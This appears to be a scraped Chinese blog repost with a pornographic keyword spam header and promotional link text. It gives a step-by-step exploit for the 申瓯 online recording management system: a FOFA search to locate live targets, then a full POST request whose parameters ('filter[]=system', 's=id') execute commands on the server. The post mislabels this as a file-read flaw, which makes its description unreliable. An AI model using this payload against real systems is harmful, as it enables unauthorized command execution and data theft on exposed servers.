欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

首頁綜合 正文
目錄

柚子快報激活碼778899分享:安全 任意文件讀取漏洞

柚子快報激活碼778899分享:安全 任意文件讀取漏洞

http://yzkb.51969.com/

? ? ? 申甌通信設備有限公司在線錄音管理系統(tǒng) index.php接口處存在任意文件讀取漏洞,惡意攻擊者可能利用該漏洞讀取服務器上的敏感文件,例如客戶記錄、財務數(shù)據(jù)或源代碼,導致數(shù)據(jù)泄露。我們去fofa中用如下語法進行搜索

title="在線錄音管理系統(tǒng)"

開啟抓包后任意訪問其中一個網(wǎng)站

將數(shù)據(jù)包右鍵發(fā)送到重放器,并將其替換為如下數(shù)據(jù)包,其中127.0.0.1位置為訪問的ip地址

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Content-type: application/x-www-form-urlencoded

Cache-Control: no-cache

Pragma: no-cache

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: close

Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

然后點擊發(fā)送,即可看到查詢的內容

柚子快報激活碼778899分享:安全 任意文件讀取漏洞

http://yzkb.51969.com/

精彩文章

評論可見,查看隱藏內容

本文內容根據(jù)網(wǎng)絡資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點和立場。

轉載請注明,如有侵權,聯(lián)系刪除。

本文鏈接:http://m.gantiao.com.cn/post/19285561.html

發(fā)布評論

您暫未設置收款碼

請在主題配置——文章設置里上傳

掃描二維碼手機訪問

文章目錄